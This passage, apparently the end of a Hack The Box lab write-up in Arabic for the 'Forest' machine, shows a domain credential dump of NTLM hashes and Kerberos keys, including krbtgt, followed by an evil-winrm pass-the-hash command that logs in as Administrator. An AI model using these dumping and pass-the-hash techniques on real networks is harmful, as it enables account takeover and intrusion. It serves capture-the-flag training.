htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
mhzcyber:7603:aad3b435b51404eeaad3b435b51404ee:d125f87e011e94befd9c2e95cd7bf6d8:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:c98c4ac523194ebdb86a7009a48a3869:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
mhzcyber:aes256-cts-hmac-sha1-96:30671286f1beefe4220f5246e81986b5a6c95c8d715aeeeb1b5f5b2119d80f54
mhzcyber:aes128-cts-hmac-sha1-96:09b0da7b45273c09114d6d8da09fc8cf
mhzcyber:des-cbc-md5:badf3761bccb37c7
FOREST$:aes256-cts-hmac-sha1-96:0925c00de36b6564a91e1a4eba0728f775194644fbbb73df01ba0a81957f5d91
FOREST$:aes128-cts-hmac-sha1-96:23b1ec84e827ca0ecf5557442076ac6a
FOREST$:des-cbc-md5:c8132fbf73c71fa8
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

اخدنا ال hashes ممكن نعمل عدة شغلات هلق, اسهلها و اسرعها هي PtH او Pass the Hash و الي هي انك بتبعت الهاش بدل الباسورد رح استخدم evil-winrm متل ما عملنا من قبل, بس هي المرة بدون كلمة سر

evil-winrm -i 10.10.10.161 -u 'Administrator' -H 32693b11e6aa90eb43d32c72a07ceea6

عموما هيك خلصنا, في شوية تكنيكات مذكورة حابب ابقى اشرحهم بشكل معمق اكتر, لأجل التسلية بس عموما هي كانت سهلة مافي شي صعب, اكيد انت بتعرف كيف تروح تجيب ال flag لحالك

Happy Hacking

MHZ-Cyber